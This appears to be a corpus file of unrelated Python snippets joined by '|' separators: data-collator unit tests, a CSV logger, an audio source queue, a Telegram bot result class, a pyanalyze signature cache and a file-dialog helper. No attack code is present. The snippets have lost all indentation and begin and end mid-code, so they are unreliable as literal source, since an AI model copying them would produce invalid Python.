assert np.isclose(i_amp[2133590], 2.e-20), 'The final value of i_amp is not as expected.'
print('test_inspiralfuns_numerical completed successfully') |
class NumpyDataCollatorIntegrationTest(unittest.TestCase):
def setUp(self):
self.tmpdirname = tempfile.mkdtemp()
vocab_tokens = ['[UNK]', '[CLS]', '[SEP]', '[PAD]', '[MASK]']
self.vocab_file = os.path.join(self.tmpdirname, 'vocab.txt')
with open(self.vocab_file, 'w', encoding='utf-8') as vocab_writer:
vocab_writer.write(''.join([(x + '\n') for x in vocab_tokens]))
def tearDown(self):
shutil.rmtree(self.tmpdirname)
def test_default_with_dict(self):
features = [{'label': i, 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].tolist(), list(range(8)))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 6))
features = [{'label_ids': [0, 1, 2], 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].tolist(), ([[0, 1, 2]] * 8))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 6))
features = [{'label': i, 'inputs': np.random.randint(0, 10, [10])} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].tolist(), list(range(8)))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 10))
features = [{'label': np.array(i), 'inputs': np.random.randint(0, 10, [10])} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['labels'].tolist(), list(range(8)))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 10))
def test_default_classification_and_regression(self):
data_collator = default_data_collator
features = [{'input_ids': [0, 1, 2, 3, 4], 'label': i} for i in range(4)]
batch = data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].dtype, np.int64)
features = [{'input_ids': [0, 1, 2, 3, 4], 'label': float(i)} for i in range(4)]
batch = data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].dtype, np.float32)
def test_default_with_no_labels(self):
features = [{'label': None, 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertTrue(('labels' not in batch))
self.assertEqual(batch['inputs'].shape, (8, 6))
features = [{'label_ids': None, 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertTrue(('labels' not in batch))
self.assertEqual(batch['inputs'].shape, (8, 6))
def test_data_collator_with_padding(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': [0, 1, 2]}, {'input_ids': [0, 1, 2, 3, 4, 5]}]
data_collator = DataCollatorWithPadding(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 6))
self.assertEqual(batch['input_ids'][0].tolist(), ([0, 1, 2] + ([tokenizer.pad_token_id] * 3)))
data_collator = DataCollatorWithPadding(tokenizer, padding='max_length', max_length=10, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
def test_data_collator_for_token_classification(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': [0, 1, 2], 'labels': [0, 1, 2]}, {'input_ids': [0, 1, 2, 3, 4, 5], 'labels': [0, 1, 2, 3, 4, 5]}]
data_collator = DataCollatorForTokenClassification(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 6))
self.assertEqual(batch['input_ids'][0].tolist(), ([0, 1, 2] + ([tokenizer.pad_token_id] * 3)))
self.assertEqual(batch['labels'].shape, (2, 6))
self.assertEqual(batch['labels'][0].tolist(), ([0, 1, 2] + ([(- 100)] * 3)))
data_collator = DataCollatorForTokenClassification(tokenizer, padding='max_length', max_length=10, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
data_collator = DataCollatorForTokenClassification(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
self.assertEqual(batch['labels'].shape, (2, 8))
data_collator = DataCollatorForTokenClassification(tokenizer, label_pad_token_id=(- 1), return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 6))
self.assertEqual(batch['input_ids'][0].tolist(), ([0, 1, 2] + ([tokenizer.pad_token_id] * 3)))
self.assertEqual(batch['labels'].shape, (2, 6))
self.assertEqual(batch['labels'][0].tolist(), ([0, 1, 2] + ([(- 1)] * 3)))
def _test_no_pad_and_pad(self, no_pad_features, pad_features):
tokenizer = BertTokenizer(self.vocab_file)
data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
batch = data_collator(pad_features, return_tensors='np')
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
batch = data_collator(pad_features, return_tensors='np')
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
tokenizer._pad_token = None
data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False, return_tensors='np')
with self.assertRaises(ValueError):
data_collator(pad_features)
set_seed(42)
tokenizer = BertTokenizer(self.vocab_file)
data_collator = DataCollatorForLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
batch = data_collator(pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
data_collator = DataCollatorForLanguageModeling(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
batch = data_collator(pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
def test_data_collator_for_language_modeling(self):
no_pad_features = [{'input_ids': list(range(10))}, {'input_ids': list(range(10))}]
pad_features = [{'input_ids': list(range(5))}, {'input_ids': list(range(10))}]
self._test_no_pad_and_pad(no_pad_features, pad_features)
no_pad_features = [list(range(10)), list(range(10))]
pad_features = [list(range(5)), list(range(10))]
self._test_no_pad_and_pad(no_pad_features, pad_features)
def test_data_collator_for_whole_word_mask(self):
tokenizer = BertTokenizer(self.vocab_file)
data_collator = DataCollatorForWholeWordMask(tokenizer, return_tensors='np')
features = [{'input_ids': list(range(10))}, {'input_ids': list(range(10))}]
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
features = [{'input_ids': np.arange(10)}, {'input_ids': np.arange(10)}]
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
def test_plm(self):
tokenizer = BertTokenizer(self.vocab_file)
no_pad_features = [{'input_ids': list(range(10))}, {'input_ids': list(range(10))}]
pad_features = [{'input_ids': list(range(5))}, {'input_ids': list(range(10))}]
data_collator = DataCollatorForPermutationLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(pad_features)
self.assertIsInstance(batch, dict)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['perm_mask'].shape, (2, 10, 10))
self.assertEqual(batch['target_mapping'].shape, (2, 10, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
batch = data_collator(no_pad_features)
self.assertIsInstance(batch, dict)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['perm_mask'].shape, (2, 10, 10))
self.assertEqual(batch['target_mapping'].shape, (2, 10, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
example = [np.random.randint(0, 5, [5])]
with self.assertRaises(ValueError):
data_collator(example)
def test_nsp(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': [0, 1, 2, 3, 4], 'token_type_ids': [0, 1, 2, 3, 4], 'next_sentence_label': i} for i in range(2)]
data_collator = DataCollatorForLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 5))
self.assertEqual(batch['token_type_ids'].shape, (2, 5))
self.assertEqual(batch['labels'].shape, (2, 5))
self.assertEqual(batch['next_sentence_label'].shape, (2,))
data_collator = DataCollatorForLanguageModeling(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
self.assertEqual(batch['token_type_ids'].shape, (2, 8))
self.assertEqual(batch['labels'].shape, (2, 8))
self.assertEqual(batch['next_sentence_label'].shape, (2,))
def test_sop(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': np.array([0, 1, 2, 3, 4]), 'token_type_ids': np.array([0, 1, 2, 3, 4]), 'sentence_order_label': i} for i in range(2)]
data_collator = DataCollatorForLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 5))
self.assertEqual(batch['token_type_ids'].shape, (2, 5))
self.assertEqual(batch['labels'].shape, (2, 5))
self.assertEqual(batch['sentence_order_label'].shape, (2,))
data_collator = DataCollatorForLanguageModeling(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
self.assertEqual(batch['token_type_ids'].shape, (2, 8))
self.assertEqual(batch['labels'].shape, (2, 8))
self.assertEqual(batch['sentence_order_label'].shape, (2,)) |
class CsvLogger():
def __init__(self, filepath='./', filename='validate_record.csv', data=None, fieldsnames=['epoch', 'train_loss', 'val_loss', 'Bleu_4', 'METEOR', 'ROUGE_L', 'CIDEr']):
self.log_path = filepath
if (not os.path.exists(filepath)):
os.makedirs(filepath)
if filename:
self.log_name = filename
self.csv_path = os.path.join(self.log_path, self.log_name)
self.fieldsnames = fieldsnames
if (not os.path.exists(self.csv_path)):
with open(self.csv_path, 'w') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writeheader()
self.data = {}
for field in self.fieldsnames:
self.data[field] = []
if (data is not None):
for d in data:
d_num = {}
for key in d:
d_num[key] = (float(d[key]) if (key != 'epoch') else int(d[key]))
self.write(d_num)
def write(self, data):
for k in self.data:
self.data[k].append(data[k])
data = {k: v for (k, v) in data.items() if (k in self.data.keys())}
with open(self.csv_path, 'a') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writerow(data)
def write_text(self, text, print_t=True):
with open(os.path.join(self.log_path, 'log.txt'), 'a') as f:
f.write('{}\n'.format(text))
if print_t:
tqdm.write(text) |
def test_append_with_list_input():
context = Context({'arblist': [1, 2], 'append': {'list': PyString('arblist'), 'addMe': 3}})
append.run_step(context)
context['append']['addMe'] = 4
append.run_step(context)
assert (context['arblist'] == [1, 2, 3, 4])
assert (len(context) == 2) |
class SourceGroup():
def __init__(self) -> None:
self.audio_format = None
self.video_format = None
self.info = None
self.duration = 0.0
self._timestamp_offset = 0.0
self._dequeued_durations = []
self._sources = []
self.is_player_source = False
def is_precise(self) -> bool:
return False
def seek(self, time: float) -> None:
if self._sources:
self._sources[0].seek(time)
def add(self, source: Source) -> None:
self.audio_format = (self.audio_format or source.audio_format)
self.info = (self.info or source.info)
source = source.get_queue_source()
assert (source.audio_format == self.audio_format), 'Sources must share the same audio format.'
self._sources.append(source)
self.duration += source.duration
def has_next(self) -> bool:
return (len(self._sources) > 1)
def get_queue_source(self) -> 'SourceGroup':
return self
def _advance(self) -> None:
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
if isinstance(old_source, StreamingSource):
old_source.delete()
def get_audio_data(self, num_bytes: float, compensation_time=0.0) -> Optional[AudioData]:
if (not self._sources):
return None
buffer = b''
duration = 0.0
timestamp = 0.0
while ((len(buffer) < num_bytes) and self._sources):
audiodata = self._sources[0].get_audio_data(num_bytes)
if audiodata:
buffer += audiodata.data
duration += audiodata.duration
timestamp += self._timestamp_offset
else:
self._advance()
return AudioData(buffer, len(buffer), timestamp, duration) |
class InlineQueryResultAudio(InlineQueryResult):
__slots__ = ('reply_markup', 'caption_entities', 'caption', 'title', 'parse_mode', 'audio_url', 'performer', 'input_message_content', 'audio_duration')
def __init__(self, id: str, audio_url: str, title: str, performer: Optional[str]=None, audio_duration: Optional[int]=None, caption: Optional[str]=None, reply_markup: Optional[InlineKeyboardMarkup]=None, input_message_content: Optional['InputMessageContent']=None, parse_mode: ODVInput[str]=DEFAULT_NONE, caption_entities: Optional[Sequence[MessageEntity]]=None, *, api_kwargs: Optional[JSONDict]=None):
super().__init__(InlineQueryResultType.AUDIO, id, api_kwargs=api_kwargs)
with self._unfrozen():
self.audio_url: str = audio_url
self.title: str = title
self.performer: Optional[str] = performer
self.audio_duration: Optional[int] = audio_duration
self.caption: Optional[str] = caption
self.parse_mode: ODVInput[str] = parse_mode
self.caption_entities: Tuple[(MessageEntity, ...)] = parse_sequence_arg(caption_entities)
self.reply_markup: Optional[InlineKeyboardMarkup] = reply_markup
self.input_message_content: Optional[InputMessageContent] = input_message_content |
class ArgSpecCache():
DEFAULT_ARGSPECS = implementation.get_default_argspecs()
def __init__(self, options: Options, ts_finder: TypeshedFinder, ctx: CanAssignContext, *, vnv_provider: Callable[([str], Optional[Value])]=(lambda _: None)) -> None:
self.vnv_provider = vnv_provider
self.options = options
self.ts_finder = ts_finder
self.ctx = ctx
self.known_argspecs = {}
self.generic_bases_cache = {}
self.default_context = AnnotationsContext(self)
self.safe_bases = tuple(self.options.get_value_for(ClassesSafeToInstantiate))
default_argspecs = dict(self.DEFAULT_ARGSPECS)
for provider in _BUILTIN_KNOWN_SIGNATURES:
default_argspecs.update(provider(self))
for provider in options.get_value_for(KnownSignatures):
default_argspecs.update(provider(self))
for (obj, argspec) in default_argspecs.items():
self.known_argspecs[obj] = argspec
def from_signature(self, sig: inspect.Signature, *, impl: Optional[Impl]=None, callable_object: object, function_object: object, is_async: bool=False, is_asynq: bool=False, returns: Optional[Value]=None, allow_call: bool=False) -> Signature:
func_globals = getattr(function_object, '__globals__', None)
is_wrapped = hasattr_static(function_object, '__wrapped__')
if (returns is not None):
has_return_annotation = True
else:
if (is_wrapped or (sig.return_annotation is inspect.Signature.empty)):
returns = AnyValue(AnySource.unannotated)
has_return_annotation = False
else:
returns = type_from_runtime(sig.return_annotation, ctx=AnnotationsContext(self, func_globals))
has_return_annotation = True
if is_async:
returns = make_coro_type(returns)
parameters = []
for (i, parameter) in enumerate(sig.parameters.values()):
(param, make_everything_pos_only) = self._make_sig_parameter(parameter, func_globals, function_object, is_wrapped, i)
if make_everything_pos_only:
parameters = [replace(param, kind=ParameterKind.POSITIONAL_ONLY) for param in parameters]
parameters.append(param)
return Signature.make(parameters, returns, impl=impl, callable=callable_object, has_return_annotation=has_return_annotation, is_asynq=is_asynq, allow_call=(allow_call or FunctionsSafeToCall.contains(callable_object, self.options)))
def _make_sig_parameter(self, parameter: inspect.Parameter, func_globals: Optional[Mapping[(str, object)]], function_object: Optional[object], is_wrapped: bool, index: int) -> Tuple[(SigParameter, bool)]:
if is_wrapped:
typ = AnyValue(AnySource.inference)
else:
typ = self._get_type_for_parameter(parameter, func_globals, function_object, index)
if (parameter.default is inspect.Parameter.empty):
default = None
else:
default = KnownValue(parameter.default)
if ((parameter.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD) and is_positional_only_arg_name(parameter.name, _get_class_name(function_object))):
kind = ParameterKind.POSITIONAL_ONLY
make_everything_pos_only = True
else:
kind = ParameterKind(parameter.kind)
make_everything_pos_only = False
return (SigParameter(parameter.name, kind, default=default, annotation=typ), make_everything_pos_only)
def _get_type_for_parameter(self, parameter: inspect.Parameter, func_globals: Optional[Mapping[(str, object)]], function_object: Optional[object], index: int) -> Value:
if (parameter.annotation is not inspect.Parameter.empty):
kind = ParameterKind(parameter.kind)
ctx = AnnotationsContext(self, func_globals)
typ = type_from_runtime(parameter.annotation, ctx=ctx, allow_unpack=kind.allow_unpack())
return translate_vararg_type(kind, typ, self.ctx)
elif ((index == 0) and (parameter.kind in (inspect.Parameter.POSITIONAL_ONLY, inspect.Parameter.POSITIONAL_OR_KEYWORD))):
module_name = getattr(function_object, '__module__', None)
qualname = getattr(function_object, '__qualname__', None)
name = getattr(function_object, '__name__', None)
if ((qualname != name) and (module_name is not None) and (module_name in sys.modules)):
module = sys.modules[module_name]
(*class_names, function_name) = qualname.split('.')
class_obj = module
for class_name in class_names:
class_obj = getattr(class_obj, class_name, None)
if (class_obj is None):
break
if (isinstance(class_obj, type) and (inspect.getattr_static(class_obj, function_name, None) is function_object)):
generic_bases = self._get_generic_bases_cached(class_obj)
if (generic_bases and generic_bases.get(class_obj)):
return GenericValue(class_obj, generic_bases[class_obj].values())
return TypedValue(class_obj)
if (parameter.kind in (inspect.Parameter.POSITIONAL_ONLY, inspect.Parameter.POSITIONAL_OR_KEYWORD, inspect.Parameter.KEYWORD_ONLY)):
vnv = self.vnv_provider(parameter.name)
if (vnv is not None):
return vnv
return AnyValue(AnySource.unannotated)
def get_argspec(self, obj: object, impl: Optional[Impl]=None, is_asynq: bool=False, allow_synthetic_type: bool=False) -> MaybeSignature:
if (safe_isinstance(obj, str) and (not allow_synthetic_type)):
return None
return self._cached_get_argspec(obj, impl, is_asynq, in_overload_resolution=False)
def get_concrete_signature(self, obj: object, impl: Optional[Impl]=None, *, allow_call: bool=False) -> Signature:
sig = self.get_argspec(obj, impl=impl)
if (not isinstance(sig, Signature)):
raise TypeError(f'failed to find a concrete signature or {obj}')
return replace(sig, allow_call=allow_call)
def _cached_get_argspec(self, obj: object, impl: Optional[Impl], is_asynq: bool, in_overload_resolution: bool) -> MaybeSignature:
try:
if (obj in self.known_argspecs):
return self.known_argspecs[obj]
except Exception:
hashable = False
else:
hashable = True
extended = self._uncached_get_argspec(obj, impl, is_asynq, in_overload_resolution)
if (extended is None):
return None
if hashable:
self.known_argspecs[obj] = extended
return extended
def _maybe_make_evaluator_sig(self, func: Callable[(..., Any)], impl: Optional[Impl], is_asynq: bool) -> MaybeSignature:
try:
key = f'{func.__module__}.{func.__qualname__}'
except AttributeError:
return None
evaluation_funcs = get_type_evaluations(key)
if (not evaluation_funcs):
return None
sigs = []
for evaluation_func in evaluation_funcs:
if ((evaluation_func is None) or (not hasattr(evaluation_func, '__globals__'))):
return None
sig = self._cached_get_argspec(evaluation_func, impl, is_asynq, in_overload_resolution=True)
if (not isinstance(sig, Signature)):
return None
(lines, _) = inspect.getsourcelines(evaluation_func)
code = textwrap.dedent(''.join(lines))
body = ast.parse(code)
if (not body.body):
return None
evaluator_node = body.body[0]
if (not isinstance(evaluator_node, ast.FunctionDef)):
return None
evaluator = RuntimeEvaluator(evaluator_node, sig.return_value, evaluation_func.__globals__, evaluation_func)
sigs.append(replace(sig, evaluator=evaluator))
if (len(sigs) == 1):
return sigs[0]
return OverloadedSignature(sigs)
def _uncached_get_argspec(self, obj: Any, impl: Optional[Impl], is_asynq: bool, in_overload_resolution: bool) -> MaybeSignature:
if isinstance(obj, tuple):
return None
if is_dot_asynq_function(obj):
try:
return self._cached_get_argspec(obj.__self__, impl, is_asynq, in_overload_resolution)
except TypeError:
pass
if safe_isinstance(obj, MethodWrapperType):
try:
unbound = getattr(obj.__objclass__, obj.__name__)
except Exception:
pass
else:
sig = self._cached_get_argspec(unbound, impl, is_asynq, in_overload_resolution)
if (sig is not None):
return make_bound_method(sig, Composite(KnownValue(obj.__self__)))
if (inspect.ismethod(obj) and (obj.__self__ is not None)):
argspec = self._cached_get_argspec(obj.__func__, impl, is_asynq, in_overload_resolution)
return make_bound_method(argspec, Composite(KnownValue(obj.__self__)))
if (not in_overload_resolution):
for get_overloads_func in _GET_OVERLOADS:
inner_obj = safe_getattr(obj, '__func__', obj)
if (safe_hasattr(inner_obj, '__module__') and safe_hasattr(inner_obj, '__qualname__')):
sig = self._maybe_make_overloaded_signature(get_overloads_func(inner_obj), impl, is_asynq)
if (sig is not None):
return sig
fq_name = get_fully_qualified_name(obj)
if (fq_name is not None):
sig = self._maybe_make_overloaded_signature(pyanalyze_get_overloads(fq_name), impl, is_asynq)
if (sig is not None):
return sig
evaluator_sig = self._maybe_make_evaluator_sig(obj, impl, is_asynq)
if (evaluator_sig is not None):
return evaluator_sig
if (hasattr_static(obj, 'fn') or hasattr_static(obj, 'original_fn')):
is_asynq = (is_asynq or hasattr_static(obj, 'asynq'))
try:
original_fn = qcore.get_original_fn(obj)
except (TypeError, AttributeError):
pass
else:
return self._cached_get_argspec(original_fn, impl, is_asynq, in_overload_resolution)
if (safe_isinstance(obj, type) and safe_issubclass(obj, enum.Enum) and safe_isinstance(obj.__call__, MethodType) and safe_equals(obj.__call__.__func__, _ENUM_CALL)):
signature = self._cached_get_argspec(_ENUM_CALL, impl, is_asynq, in_overload_resolution)
self_value = SubclassValue(TypedValue(obj))
bound_sig = make_bound_method(signature, Composite(self_value))
if (bound_sig is None):
return None
sig = bound_sig.get_signature(preserve_impl=True, ctx=self.ctx, self_annotation_value=self_value)
if (sig is not None):
return sig
return bound_sig
allow_call = (FunctionsSafeToCall.contains(obj, self.options) or (safe_isinstance(obj, type) and safe_issubclass(obj, self.safe_bases)))
if safe_isinstance(obj, (type, str)):
type_params = self.get_type_parameters(obj)
else:
type_params = []
argspec = self.ts_finder.get_argspec(obj, allow_call=allow_call, type_params=type_params)
if (argspec is not None):
return argspec
if (is_typeddict(obj) and (not is_typing_name(obj, 'TypedDict'))):
td_type = type_from_runtime(obj)
if isinstance(td_type, TypedDictValue):
params = [SigParameter(key, ParameterKind.KEYWORD_ONLY, default=(None if required else KnownValue(...)), annotation=value) for (key, (required, value)) in td_type.items.items()]
if (td_type.extra_keys is not None):
annotation = GenericValue(dict, [TypedValue(str), td_type.extra_keys])
params.append(SigParameter('%kwargs', ParameterKind.VAR_KEYWORD, annotation=annotation))
return Signature.make(params, td_type, callable=obj)
if is_newtype(obj):
assert hasattr(obj, '__supertype__')
return Signature.make([SigParameter('x', ParameterKind.POSITIONAL_ONLY, annotation=type_from_runtime(obj.__supertype__, ctx=self.default_context))], NewTypeValue(obj), callable=obj)
if inspect.isfunction(obj):
if hasattr_static(obj, 'inner'):
return self._cached_get_argspec(obj.inner, impl, is_asynq, in_overload_resolution)
inspect_sig = self._safe_get_signature(obj)
if (inspect_sig is None):
return self._make_any_sig(obj)
return self.from_signature(inspect_sig, function_object=obj, callable_object=obj, is_async=asyncio.iscoroutinefunction(obj), impl=impl, is_asynq=is_asynq)
if _is_qcore_decorator(obj):
argspec = self._cached_get_argspec(obj.decorator, impl, is_asynq, in_overload_resolution)
if ((obj.instance is not None) and (argspec is not None)):
return make_bound_method(argspec, Composite(KnownValue(obj.instance)))
return argspec
if inspect.isclass(obj):
obj = UnwrapClass.unwrap(obj, self.options)
override = ConstructorHooks.get_constructor(obj, self.options)
is_dunder_new = False
if isinstance(override, Signature):
signature = override
else:
should_ignore = IgnoredCallees.contains(obj, self.options)
if should_ignore:
return_type = AnyValue(AnySource.error)
elif type_params:
return_type = GenericValue(obj, type_params)
else:
return_type = TypedValue(obj)
if isinstance(override, inspect.Signature):
inspect_sig = override
constructor = None
elif ((override is None) and hasattr_static(obj, '__signature__') and safe_isinstance(obj.__signature__, inspect.Signature)):
inspect_sig = obj.__signature__.replace(parameters=[_SELF_PARAM, *obj.__signature__.parameters.values()])
constructor = obj
else:
if (override is not None):
constructor = override
elif isinstance(obj.__new__, FunctionType):
is_dunder_new = True
constructor = obj.__new__
else:
constructor = obj.__init__
inspect_sig = self._safe_get_signature(constructor)
if (inspect_sig is None):
return Signature.make([ELLIPSIS_PARAM], return_type, callable=obj, allow_call=allow_call)
signature = self.from_signature(inspect_sig, function_object=constructor, callable_object=obj, impl=impl, returns=return_type, allow_call=allow_call)
bound_sig = make_bound_method(signature, Composite(TypedValue(obj)))
if (bound_sig is None):
return None
if is_dunder_new:
self_annotation_value = KnownValue(obj)
elif type_params:
self_annotation_value = GenericValue(obj, type_params)
else:
self_annotation_value = TypedValue(obj)
sig = bound_sig.get_signature(preserve_impl=True, ctx=self.ctx, self_annotation_value=self_annotation_value)
if (sig is not None):
return sig
return bound_sig
if inspect.isbuiltin(obj):
if isinstance(obj.__self__, ModuleType):
inspect_sig = self._safe_get_signature(obj)
if (inspect_sig is not None):
return self.from_signature(inspect_sig, function_object=obj, callable_object=obj)
return self._make_any_sig(obj)
else:
cls = type(obj.__self__)
try:
method = getattr(cls, obj.__name__)
except AttributeError:
return self._make_any_sig(obj)
if (method == obj):
return self._make_any_sig(obj)
argspec = self._cached_get_argspec(method, impl, is_asynq, in_overload_resolution)
return make_bound_method(argspec, Composite(KnownValue(obj.__self__)))
if hasattr_static(obj, '__call__'):
return self._make_any_sig(obj)
return None
def _maybe_make_overloaded_signature(self, overloads: Sequence[Callable[(..., Any)]], impl: Optional[Impl], is_asynq: bool) -> Optional[OverloadedSignature]:
if (not overloads):
return None
sigs = [self._cached_get_argspec(overload, impl, is_asynq, in_overload_resolution=True) for overload in overloads]
if (not all_of_type(sigs, Signature)):
return None
return OverloadedSignature(sigs)
def _make_any_sig(self, obj: object) -> Signature:
if FunctionsSafeToCall.contains(obj, self.options):
return Signature.make([ELLIPSIS_PARAM], AnyValue(AnySource.inference), is_asynq=True, allow_call=True, callable=obj)
else:
return ANY_SIGNATURE
def _safe_get_signature(self, obj: Any) -> Optional[inspect.Signature]:
try:
return inspect.signature(obj, follow_wrapped=False)
except (TypeError, ValueError, AttributeError):
return None
def get_type_parameters(self, typ: Union[(type, str)]) -> List[Value]:
bases = self.get_generic_bases(typ, substitute_typevars=False)
tv_map = bases.get(typ, {})
return [tv for tv in tv_map.values()]
def get_generic_bases(self, typ: Union[(type, str)], generic_args: Sequence[Value]=(), *, substitute_typevars: bool=True) -> GenericBases:
if ((typ is Generic) or is_typing_name(typ, 'Protocol') or (typ is object) or (typ in ('typing.Generic', 'typing_extensions.Generic', 'builtins.object'))):
return {}
generic_bases = self._get_generic_bases_cached(typ)
if (typ not in generic_bases):
return generic_bases
my_typevars = generic_bases[typ]
if (not my_typevars):
return generic_bases
tv_map = {}
if substitute_typevars:
for (i, tv_value) in enumerate(my_typevars.values()):
if (not isinstance(tv_value, TypeVarValue)):
continue
try:
value = generic_args[i]
except IndexError:
value = AnyValue(AnySource.generic_argument)
tv_map[tv_value.typevar] = value
return {base: {tv: value.substitute_typevars(tv_map) for (tv, value) in args.items()} for (base, args) in generic_bases.items()}
def _get_generic_bases_cached(self, typ: Union[(type, str)]) -> GenericBases:
try:
return self.generic_bases_cache[typ]
except KeyError:
pass
except Exception:
return {}
if isinstance(typ, str):
bases = self.ts_finder.get_bases_for_fq_name(typ)
else:
bases = self.ts_finder.get_bases(typ)
generic_bases = self._extract_bases(typ, bases)
if (generic_bases is None):
assert isinstance(typ, type), f'failed to extract typeshed bases for {typ!r}'
bases = [type_from_runtime(base, ctx=self.default_context) for base in self.get_runtime_bases(typ)]
generic_bases = self._extract_bases(typ, bases)
assert (generic_bases is not None), f'failed to extract runtime bases from {typ}'
self.generic_bases_cache[typ] = generic_bases
return generic_bases
def _extract_bases(self, typ: Union[(type, str)], bases: Optional[Sequence[Value]]) -> Optional[GenericBases]:
if (bases is None):
return None
bases = sorted(bases, key=(lambda base: ((not isinstance(base, TypedValue)) or (base.typ is not Generic))))
my_typevars = uniq_chain((extract_typevars(base) for base in bases))
generic_bases = {}
generic_bases[typ] = {tv: TypeVarValue(tv) for tv in my_typevars}
for base in bases:
if isinstance(base, TypedValue):
if isinstance(base.typ, str):
assert (base.typ != typ), base
else:
assert (base.typ is not typ), base
if isinstance(base, GenericValue):
args = base.args
else:
args = ()
generic_bases.update(self.get_generic_bases(base.typ, args))
else:
return None
return generic_bases
def get_runtime_bases(self, typ: type) -> Sequence[object]:
if is_typeddict(typ):
return (dict,)
try:
return typ.__orig_bases__
except AttributeError:
return typ.__bases__ |
def getSaveFileName(*, parent, title, filename, filter='', default_extension: str=None, default_filter: str=None, config: 'SimpleConfig') -> Optional[str]:
directory = config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(parent, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert (default_filter in filter), f'default_filter={default_filter!r} does not appear in filter={filter!r}'
